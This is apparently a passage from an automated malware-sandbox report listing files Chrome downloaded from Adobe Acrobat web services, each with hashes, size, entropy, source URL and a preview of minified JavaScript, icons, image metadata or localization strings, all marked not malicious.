                                                      SHA1:3EBFBEA88288DF36010F5F844D2C54A91500597F
                                                      SHA-256:D210F85CADBADBD89EE845F2BB81220CA313F2B402E7973604E2EA7B546E82F8
                                                      SHA-512:FC5A0825828D960CF317F3F5C6C64E0900BA055618FE68C96633E05C081432D6EA6A96DD7F17EC61BEF547013E1B0E0B8E2E274B6C11EF8A131E178A075F03B7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"title":"ErrMissingAPIKey","status":403,"error_code":403000,"message":"API key is missing"}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (3057)
                                                      Category:downloaded
                                                      Size (bytes):3102
                                                      Entropy (8bit):4.737460614348812
                                                      Encrypted:false
                                                      SSDEEP:48:iMhzmwWRp/xu74XqNgHxfc5c1jPvCVy1l9F3TTGORkakNE/jqeZOR+fgGY88tNzv:fhzDmcOTx1ZPvCaetaYiuCO+y5bKigM
                                                      MD5:E2F115E02610D5774E5C751B23D12DCA
                                                      SHA1:2308DA3C790F0CAF5208776BD46A55B44C7F7BFD
                                                      SHA-256:81EEB896FC539198B57A7DCC8A388FA7C90C02CACA419C9BC16EFC52D4D690EA
                                                      SHA-512:B0119A5B43AE46A8DC4512DA5B99C0D58B7159DEC78E14C763FFB5DE595A59EEF0650169D4DAFB30F3BE193FB72B1268807DE201E12F10863FF19994BE7724DB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.682.0/nav-icon.js
                                                      Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[2657],{Gsnt:(e,a,l)=>{var i=l("YWiy");function SDCCombineFiles18N(e){return i.createElement("svg",e,i.createElement("g",null,[i.createElement("path",{d:"M3.55534,6.8205c-.37329.59879-.739.97552-.95352.97552a.15414.15414,0,0,1-.09625-.033.13692.13692,0,0,1-.04742-.13681C2.50215,7.41172,2.92355,7.10167,3.55534,6.8205Zm1.29726-.739c-.12238.033-.244.06668-.36574.10312q.099-.199.17737-.38774c.066-.16637.13268-.32861.1918-.49153.05156.08111.10381.1588.1588.23648a4.701,4.701,0,0,0,.3403.42142C5.35513,5.95981,5.019,6.03681,4.8526,6.0815ZM4.51642,3.11436a.14721.14721,0,0,1,.12924-.08113c.14024,0,.16982.16982.16982.31006a3.91746,3.91746,0,0,1-.18494.98651A1.71455,1.71455,0,0,1,4.51642,3.11436ZM7.1618,6.38464a.25735.25735,0,0,1-.28048.17737.47072.47072,0,0,1-.12581-.01512,2.08148,2.08148,0,0,1-.80571-.4063,4.00716,4.00716,0,0,1,.59878-.04467,2.10432,2.10432,0,0,1,.39873.02955C7.06212,6.144,7.19481,6.21072,7.1618,
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, baseline, precision 8, 927x1200, components 3
                                                      Category:downloaded
                                                      Size (bytes):82477
                                                      Entropy (8bit):7.190324114307434
                                                      Encrypted:false
                                                      SSDEEP:1536:2wL/aQQUscALVacC6f61SncSCgZnMv0nDB:2wkNcnDwnhZvN
                                                      MD5:EC9588C5F5BDEC4F34246D07E12510AF
                                                      SHA1:1E8CC5DE83737D1859A18864452D08FF1E4F32A8
                                                      SHA-256:1E94B6394917E8B95E3BD9D4B514CF4135EDDA6A2B9E7BFD2EE22B574C84A251
                                                      SHA-512:AB64E26A41A754ED5AE98BA9974B7A44749227077B0A85213C6EF0B65B1FCC46ADCFA6309CB4C56CC9A74A522390A67155164CDC9D0CC9B0C8F632617BA6D5E8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdn-sharing.adobecc.com/rendition/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5;page=0;size=1200;type=image%2Fjpeg?access_token=1742347604_urn%3Aaaid%3Asc%3AEU%3Acef22cee-e97f-4efd-9256-9a2eaeaf8ce5%3Bpublic_2f328c00d91d519b0e227d76a25f11467ec0f450&api_key=dc_sendtrack
                                                      Preview:......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.997762c, 2025/01/14-12:18:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"> <xmpMM:DerivedFrom rdf:parseType="Resource"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):284
                                                      Entropy (8bit):5.3677361090495515
                                                      Encrypted:false
                                                      SSDEEP:6:+a76xa76gurfzUv7XytFAXtVV/QTNF2GaQw/7bDqUuVV:+a7b7Zef4i3AX+TNF/ED3uVV
                                                      MD5:B3D820A5C5C3E51D2032DA7BC6F817B2
                                                      SHA1:0373B6B5723104FAA4E0B0B9D457E79E40B4CB96
                                                      SHA-256:F7272361C710791B0AD0B3F8EA719EE331C23F7157C0A92FABD938C71B52A84C
                                                      SHA-512:252E2036529DE547AD7AFEA5136C6F72E4FC4CB89AA1363D7CEA332024BD941EBB6CF56AEF60CC964E7A4F9658A4C746D013CB15C23BB57598AB5E2DBEAE108C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.582.0/modal-container-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[863],{"45AD":(a,e,l)=>{l.r(e),l.d(e,{default:()=>s});var n=l("1eri"),o=l("ZreS");const s={ModalContainer:n.Z,ModalContainerAPI:o.Z}}}]);.//# sourceMappingURL=private/modal-container-chunk.js.map
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (3130)
                                                      Category:downloaded
                                                      Size (bytes):3222
                                                      Entropy (8bit):5.32596413057695
                                                      Encrypted:false
                                                      SSDEEP:48:544b14V9GmqiSdciC+XL3H3TOTfgKPTmTUWeUBooS1ZkFRiGb3m/e4V4fJLYkf7F:54Z95qd5KzdT4VRoS2kfL5EBW/
                                                      MD5:6A76D4EB3E7954B8D35F9F803B77326B
                                                      SHA1:1B2A23137873E35C3321DDBC123A52DCFA0CB1F0
                                                      SHA-256:E20E0B61F52810D61AF0CCA5BCE035B7722BB822ABF0293D8064433BBA0D9F3F
                                                      SHA-512:D1B20F9FE422569E39341B495930E1E472E41A2113848307BD239A7615BD921FEABDD5AAD82F1F1E97F56B634B91A5D35F368040853EAC632A825517CF732672
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/localization.2c0ab46fc5493b7f2230.bundle.js
                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["localization"],{397:(e,t,n)=>{n.r(t),n.d(t,{default:()=>u});var r=n(61),o=n(610),a=n(509),_=n(338);function i(e){return i="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},i(e)}function l(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,c(r.key),r)}}function c(e){var t=function(e,t){if("object"!=i(e)||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,"string");if("object"!=i(r))return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return String(e)}(e);return"symbol"==i(t)?t:String(t)}var s={supportedLocales:["en_US","cs_CZ
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65430), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):497377
                                                      Entropy (8bit):5.781064521397155
                                                      Encrypted:false
                                                      SSDEEP:12288:3C4ZhVey4xxMSoVQonGkCmNfXGyiNPl4De22HuVdyct:3CWVey4xxMSoVQonLQt4De22Hu/
                                                      MD5:634D907841E6BDA979CD882A131DBF9E
                                                      SHA1:DF209FD2024BD0EF86C53F7F7EF52C5B52A79A3E
                                                      SHA-256:B568C8E48735FE2D757F6CDB7FF4B9EDCABE2B3E77EA2DB6FF6BDA3CA258C65A
                                                      SHA-512:FBBD07C2FA22C128C75384BD2885B8A01A0F38E794511B8FC1A0E03211F95146BD56C283895053DFF285CD9E7473613F41708BF301D9EBCC64185E19E90B48F3
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1239.0/bootstrap.js
                                                      Preview:(()=>{var e,t,o,r,i={HZFE:(e,t,o)=>{"use strict";o.d(t,{Z:()=>__WEBPACK_DEFAULT_EXPORT__});var r=o("YWiy");const __WEBPACK_DEFAULT_EXPORT__=e=>t=>o=>r.createElement(t,Object.assign({},o,e))},"7iSn":(e,t,o)=>{"use strict";var r,i,n,a,s,l,c;o.d(t,{c0:()=>n,iR:()=>s,po:()=>a,zF:()=>i}),function(e){e.GDRIVE="GDrive",e.ONEDRIVE="OneDrive",e.LOCAL="Local"}(r||(r={})),function(e){e.COMPRESS_PDF="compress-pdf",e.EXPORTPDF="exportpdf",e.EXPORT_PDF="export-pdf",e.GROUP_EXPORT_PDF="export-pdf",e.CREATEPDF="createpdf",e.EXCEL_TO_PDF="excel-to-pdf",e.JPG_TO_PDF="jpg-to-pdf",e.PNG_TO_PDF="png-to-pdf",e.PPT_TO_PDF="ppt-to-pdf",e.WORD_TO_PDF="word-to-pdf",e.PDF_TO_EXCEL="pdf-to-excel",e.PDF_TO_JPG="pdf-to-jpg",e.PDF_TO_PPT="pdf-to-ppt",e.PDF_TO_WORD="pdf-to-word",e.PDF_TO_IMAGE="pdf-to-image",e.ORGANIZE_PDF="organize-pdf",e.DELETE_PAGES="delete-pages",e.ROTATE_PAGES="rotate-pages",e.REORDER_PAGES="reorder-pages",e.INSERT_PAGES="insert-pdf",e.EXTRACT_PAGES="extract-pages",e.ORGANIZE_PDF_GROUP="organize
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (21536)
                                                      Category:downloaded
                                                      Size (bytes):21582
                                                      Entropy (8bit):5.395028158687135
                                                      Encrypted:false
                                                      SSDEEP:384:WckS8nOk11yGRoDk/Mf4gZgg4rsYTNWqiTUY4dZfnOZ0q4SN01NJi89+Fc+uX1Hy:WcmnnHyAoD8Q4gZmCD74dZ/OZ0q4SNLN
                                                      MD5:61422CE5B7A4767DB7EC742D7928D2A4
                                                      SHA1:29071DB729C13D1A2AC09BAE76774CB712FE3E93
                                                      SHA-256:9963E1474D7B5D9C7819EEA20BF72114E4B5CFCA906C1C68194DC38DE0D8DB21
                                                      SHA-512:FD235095D6DB669D37F6D9FB361C449C435A263B206E19F71BEFD1A08F472CB1280B4B0BDC30012894DC396A69785EF51FEAAFEA190D507EBB65892EC5BF1036
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-tutorial-dropin/3.35.0_4.94.0/bootstrap.js
                                                      Preview:(()=>{var e,r,t,n,o={ieSj:(e,r,t)=>{"use strict";t.d(r,{J:()=>getLocalizedMessage});var n=t("Zm2D"),o=t("plsW");const i=o.logging.getLogger("MessageUtil"),getLocalizedMessage=function(e,r){let a=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};return new Promise((_=>{t.p=o.discovery.dropins[e].public_path;const c=o.locale2.getLocale();t("AWKe")(`./${c}.json`).then((e=>{const t=(0,n.createIntlCache)(),c=(0,n.createIntl)({locale:o.locale2.getLocale(),messages:e},t);e[r]?_(c.formatMessage({id:r},a)):(i.error(`No translation for ${r}`),_(""))}))}))}},z0w2:(e,r,t)=>{var n=t("YWiy");function DcIlluMetaphorBuildingPartnership(e){return n.createElement("svg",e,[n.createElement("path",{d:"m36.91587,26.87092c-.19702.52515-.40137,1.05249-.61499,1.59839-.21387.54614-.43726,1.09131-.66846,1.66089-.20386.48315-.40991.95923-.62061,1.43848-.21045.47949-.43018.95215-.65527,1.4248s-.45532.94238-.69287,1.40625c-.2373.46362-.48315.92676-.73682,1.38501-.75708.29956-1.72607.71436-2.76855,1.21436-1.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (19783)
                                                      Category:downloaded
                                                      Size (bytes):19978
                                                      Entropy (8bit):5.203016353096644
                                                      Encrypted:false
                                                      SSDEEP:384:6AC4enVTex2CkTLOFkdrtxfbnPohG6RH1iSKibvGC+a6:6AVenVT22CSqCrtxf7PohGG+j
                                                      MD5:9A083177CF75D88F2C5C5316A19CD809
                                                      SHA1:CCDF7E437D33B1D85012830DB39919FD332FFA73
                                                      SHA-256:4EFA91CCFA3044743A10E2E8A5DDC7DFB88DA6DE4EF533580287F44FA5BC0DE5
                                                      SHA-512:678FE450532E07ABC2810E6C30C4C40A2CA3B91D63D89A8EE948C456F03BE21D3A2EA219A3A7F2063338F96DA4F4E6E28F50F2B5BAD01C49B20155D20FC7F3E1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/AnalyticsProvider.7a51c2319de965840dab.bundle.js
                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */./*! For license information please see AnalyticsProvider.7a51c2319de965840dab.bundle.js.LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["AnalyticsProvider"],{485:(t,e,r)=>{r.d(e,{Z:()=>f});var n={profileJsUrl:"https://shared-components.adobe.com/component-loader/1.0.128/main.js",version:"1.4",uncJsUrl:"https://prod.adobeccstatic.com/unc/10.0/UNC-shared.js",adobeCCStaticBase:"https://prod.adobeccstatic.com/unav",help:{helpXURL:"https://helpx.adobe.com/support.cc.html"},community:{communityURL:"https://community.adobe.com"},jarvis:{jarvisJSUrl:"https://client.messaging.adobe.com/latest/AdobeMessagingClient.js",jarvisCSSUrl:"https://client.messaging.adobe.com/latest/AdobeMessagingClient.css"},commerceUriBase:"https://commerce.adobe.com",footer:{},theme:"light",ingest:{environment:"prod",rsid:"adbem-cchome-prod"}};function o(t){return o="functio
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):404381
                                                      Entropy (8bit):5.561928854333978
                                                      Encrypted:false
                                                      SSDEEP:12288:/UdrBltGJDkoKtWg8VlK8IRzhARdrPEJFiZOGjTrsKAJh1cDP4RWdhZVzh3mahly:/UdrBltGJDkwg8VlK8IRzhARdrPEJFi4
                                                      MD5:F44F7631AE420977250DF3BF4B8482A5
                                                      SHA1:5F57E66081BD3279D2B9DA39D3F8AB0394CBB894
                                                      SHA-256:4ABD7EEE5998B4961C06CF3CCC19B099BF5C0EB69743BF4E5E6C7CC071ACE9F0
                                                      SHA-512:EE0ED6F12CD036EB64020466DF09A7A8F910E79A9F051654257750E2DB714C7C48377A546762C26C61FD44835B0119CA90526A07B5745300654EF345DEB4A845
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-viewer-dropin/3.62.0_1.1382.0/bootstrap.js
                                                      Preview:(()=>{var e,t,r,o,i={"6jw6":(e,t,r)=>{e.exports=r("EtOT")},AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var r=function cssWithMappingToString(e,t){var r=e[1]||"",o=e[3];if(!o)return r;if(t&&"function"==typeof btoa){var i=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),r="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);return"/*# ".concat(r," */")}(o),n=o.sources.map((function(e){return"/*# sourceURL=".concat(o.sourceRoot||"").concat(e," */")}));return[r].concat(n).concat([i]).join("\n")}return[r].join("\n")}(t,e);return t[2]?"@media ".concat(t[2]," {").concat(r,"}"):r})).join("")},t.i=function(e,r,o){"string"==typeof e&&(e=[[null,e,""]]);var i={};if(o)for(var n=0;n<this.length;n++){var a=this[n][0];null!=a&&(i[a]=!0)}for(var s=0;s<e.length;s++){var l=[].concat(e[s]);o&&i[l[0]]||(r&&(l[2]?l[2]="".concat(r," and ").concat(l[2]):l[2]=r),t.push(l))}},t}},"/y6
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (13155)
                                                      Category:downloaded
                                                      Size (bytes):13211
                                                      Entropy (8bit):4.596255827486776
                                                      Encrypted:false
                                                      SSDEEP:192:OGg1jMz32lQHZwXqpkpGx7J/mZ8YhW1TY54rRAcSmC:BgdMzX48mW1TY54rRtC
                                                      MD5:19372147F7DC98C5672A73186A065157
                                                      SHA1:D07C8B97F93AE3ED7105F5E5D26E489B38B724BB
                                                      SHA-256:9C1D03EB0D2D7101FDF8168DB35B45042C7D971D6ABF95D4811B1109BF89D3FB
                                                      SHA-512:CCC54DD9DD43AB486B60BFB36EEBC77F06B3D7442D5D323AA8DB2E9D0C8FED6FAAA58B34262190E113EDFF7618001CCAE14E711C031A003E3E2FC486D2F0EC13
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.682.0/context-board-icons.js
                                                      Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[9487],{VQtK:(e,l,i)=>{var C=i("YWiy");function A12CombineFiles24(e){return C.createElement("svg",e,C.createElement("g",{id:"A12_Combine-files_24",stroke:"none",strokeWidth:"1",fill:"none",fillRule:"evenodd"},[C.createElement("path",{d:"M8.86439344,2 C9.34743906,2 9.8127946,2.17163532 10.1807606,2.48125018 L10.3140271,2.60375781 L12,4.297 L12,3.93077245 C12,2.92512301 12.7188086,2.08372878 13.6541534,2.00587639 L13.7960164,2 L20.1673607,2 C20.6284441,2 21.0700722,2.17762471 21.4157751,2.49445869 L21.5407679,2.61972184 L23.4481146,4.70995246 C23.7635068,5.05562449 23.9542594,5.50692916 23.9927551,5.98413063 L24,6.16413936 L24,16.0690284 C24,17.074696 23.2811816,17.9162544 22.3458452,17.9941224 L22.2039836,18 L14.25,18 L14.25,17 L22.2039836,17 C22.5989899,17 22.9430163,16.653699 22.9936061,16.18785 L23,16.0690284 L23,7 L19.5,7 C19.2545401,7 19.0503916,6.82312484 19.0080557,6.58987563 L19,6.5 L19,3 L13.796
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (55407)
                                                      Category:downloaded
                                                      Size (bytes):55473
                                                      Entropy (8bit):5.509457102824808
                                                      Encrypted:false
                                                      SSDEEP:768:Yt9l9QGyl6hv46DkS3l5mvel4mGkvwJ7vgL9gwjhlg/sl4l/2vYTTeLi9GNnmPK8:mLil2oGhbeVfL3tb
                                                      MD5:C7C8E8D434764E856C665FD2211D1A27
                                                      SHA1:7096C09DA2B240E63F21B2AFA60A1CC49912D3A6
                                                      SHA-256:6B85B48700D1F37D404CC6E7EE4932DE24664BE519C09A6ED70AFEF5D55B3789
                                                      SHA-512:D82E5FBF50869AD87E3A2A7FB6B342115184FE5DED6DADC7DDDD2C73C53C22704E4615E3600261A8CCE8F68EB7C5B95152FE6E3D459C9B0CEDC421FA7D92C162
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/CommentsHeaderContainer-chunk.js
                                                      Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[6039],{e4dh:(e,t,n)=>{"use strict";t.U=function A4uChevronDown(e){var t=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),o.default.createElement("path",{fillRule:"evenodd",d:"M8,14.02a2,2,0,0,1,3.411-1.411l6.578,6.572,6.578-6.572a2,2,0,0,1,2.874,2.773l-.049.049L19.4,23.415a2,2,0,0,1-2.825,0h0L8.586,15.432A1.989,1.989,0,0,1,8,14.02Z"}))};var o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e},_extends.apply(this,arguments)}},"2C0X":(e,t,n)=>{"use strict";t.N=function A4uChevronUp(e){var t=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),o.default.createElement("path",{fillRule:"evenodd",d:"M
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65387), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):78234
                                                      Entropy (8bit):5.617481957276762
                                                      Encrypted:false
                                                      SSDEEP:1536:xz3L/YgDp0arIaUQrPcP82a/4hpV16r0kkCRWd/P0:93DYguzaUQrA82c4r6XkgWdn0
                                                      MD5:73B81D3BF0E555DA815BC9921791E478
                                                      SHA1:344FA69771857B81A499652545CAD9C4E6714739
                                                      SHA-256:F16F5492835F08AD142C3F2684834FD70BFCCC65B73EE5D20AF0BF9633733304
                                                      SHA-512:970E996BCA254E074E85BBC3E869F95D54775569DF5D411BB44DC0F9CF054E3281D094E95AA0E021503002B6ED341FF8C999A2ECB95F01DBB1DFDC96757561B9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/2455-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2455],{"2VSo":(e,t,n)=>{"use strict";t.E=function A4uHelpOutline(e){var t=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),o.default.createElement("path",{fillRule:"evenodd",d:"M20.18127,25.932a1.83345,1.83345,0,0,1-1.95444,2.01521A1.86185,1.86185,0,0,1,16.27145,25.932a1.95513,1.95513,0,1,1,3.90982,0ZM17.95316,8.00006a9.23221,9.23221,0,0,0-4.5182,1.0724c-.11848.06278-.11848.1843-.11848.30683v2.97112a.14919.14919,0,0,0,.23709.12152,7.38464,7.38464,0,0,1,3.74491-1.00961c1.81265,0,2.52657.76556,2.52657,1.86834,0,.94987-.56506,1.5929-1.54518,2.60353C16.8533,17.40557,15.99052,18.323,15.99052,19.763a3.41737,3.41737,0,0,0,.71392,2.11441A.488.488,0,0,0,17.09038,22h2.58581a.13062.13062,0,0,0,.11861-.21469,3.3024,3.3024,0,0,1-.47557-1.68606c0-.91747,1.09987-1.92809,2.2591-3.06226a5.4743,5.4743,0,0,0,1.90214-4.2258C23.48047,10.11549,21.51909,8.00006,17.95316,8.00006ZM35,18A17,17,0,1,1,18,1.00
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (62752)
                                                      Category:downloaded
                                                      Size (bytes):62803
                                                      Entropy (8bit):5.53677636408705
                                                      Encrypted:false
                                                      SSDEEP:768:4E6bwFEE3zAujPn4sOa3VZZut+7fjKkFyLYoV0OP2NRlYzegp2YbdyQ3wh9JmhYo:Kbruj6aly+zjyL/VMAZyswhjUxba3IX
                                                      MD5:D01CBD2A2504F089FE1028D9DA44F6D4
                                                      SHA1:E65CE23DC9C5A40D8183088E34B1C006F6442112
                                                      SHA-256:ADE1EB63D682F19CF4CEE20E33252C55204CCA77B32F508CBD7D0BC61A15D399
                                                      SHA-512:A2B74694D126470A90DB10C4DF3818C5D085F89CEE481DEF1884F7BE5227763E26F6BC4F7A3BF66069094218D8B28B3EAD4A663708C5DAEA378EB2E6B6FC9F80
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/9759-chunk.js
                                                      Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[9759],{NJIT:(e,t,r)=>{"use strict";t.B=function A4uLinkOutLight(e){var t=_extends({},e);return i.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),i.default.createElement("path",{fillRule:"evenodd",d:"M32,17.5V30H4V4H18.5a.5.5,0,0,0,.5-.5v-1a.5.5,0,0,0-.5-.5H3A1,1,0,0,0,2,3V31a1,1,0,0,0,1,1H33a1,1,0,0,0,1-1V17.5a.5.5,0,0,0-.5-.5h-1A.5.5,0,0,0,32,17.5Z"}),i.default.createElement("path",{fillRule:"evenodd",d:"M23.54,2.853l3.389,3.39-9.546,9.546a.5.5,0,0,0,0,.707L19.5,18.617a.5.5,0,0,0,.707,0l9.546-9.546,3.389,3.389A.5.5,0,0,0,34,12.107V2H23.893A.5.5,0,0,0,23.54,2.853Z"}))};var i=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var i in r)Object.prototype.hasOwnProperty.call(r,i)&&(e[i]=r[i])}return e},_extends.apply(this,argum
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (11598), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):11620
                                                      Entropy (8bit):5.381309143568083
                                                      Encrypted:false
                                                      SSDEEP:192:SVDlWJ6GMotD6WYEvkA0Zlok+RQjLWH1zlZfnh:SVBWb6WYEvYn4Xh
                                                      MD5:E9DDFFA190B34944FDA42D3E0FCD82C0
                                                      SHA1:66EED80113929CB020B16805D70BF565DD7C9619
                                                      SHA-256:C492F9D486C655AF41E356FF91C1C347B41014411B798B415171BEFF765C4CDF
                                                      SHA-512:4AECA4999959230EBDD81848E1DAB20511BB769DFED99EB65F4714D374F7EE6DE68A7DB2834BEBF921084BBA120F092B6648285E7CA48CDC154B6F22ADAC5498
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-tutorial-dropin/3.35.0_4.94.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-tutorial-dropin"]=self["webpackJsonp-tutorial-dropin"]||[]).push([[3577],{t39f:_=>{_.exports=JSON.parse('{"ACCESS_DENIED":"Access Denied","NO_ACCESS_MSG":"You do not have access to this service. Contact your IT administrator to gain access.","SIGN_IN_DIFF":"Sign in with a different account","TUTORIAL_PANEL_HEADER_CLOSE":"Close tutorial panel","TUTORIAL_PANEL_HEADER_TITLE":"Hands-on Tutorial","TUTORIAL_PANEL_BANNER_LABEL":"Get started with Acrobat online","TUTORIAL_BANNER_ALT_EDIT_DEMO":"Edit and organize a PDF in Acrobat","TUTORIAL_BANNER_TITLE_EDIT_DEMO":"Edit and organize a PDF in Acrobat","TUTORIAL_BANNER_DESCRIPTION_EDIT_DEMO":"Follow easy steps to edit text in a PDF, rotate an image, and reorder pages.","TUTORIAL_BANNER_DURATION_EDIT_DEMO":"2 min","TUTORIAL_END_TITLE_EDIT_DEMO_SIGNED_IN":"Do more with PDFs","TUTORIAL_END_DESCRIPTION_EDIT_DEMO_SIGNED_IN":"Use your new skills in a file of your own and explore more Acrobat tools.","TUTORIAL_END_TITLE_
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):332270
                                                      Entropy (8bit):5.761223767964961
                                                      Encrypted:false
                                                      SSDEEP:6144:YezeSgePLieHYtddJcJUwFs9x/2leTkDva1:Y+B46sfTkre
                                                      MD5:8580741F17C688FEA5FEE6AD78A9D36B
                                                      SHA1:B6236C16E60F6203E965E486F2B69CA7B7FF8F57
                                                      SHA-256:7EA5B9A6FDEA6197096ABB31592BC5EBD64A8331908A73FC42BF3864E7D5502C
                                                      SHA-512:C95DF095A18D3E0DE09B16F3B9FEE87FF37AB4ACF863B6AA0276D5CD4C08FBD24DC607E9938BD41D1CF7CDCD51265D32137828E79D2CAF96FE1EB4A109F44CCD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-side-nav-dropin/3.46.1_1.312.0/bootstrap.js
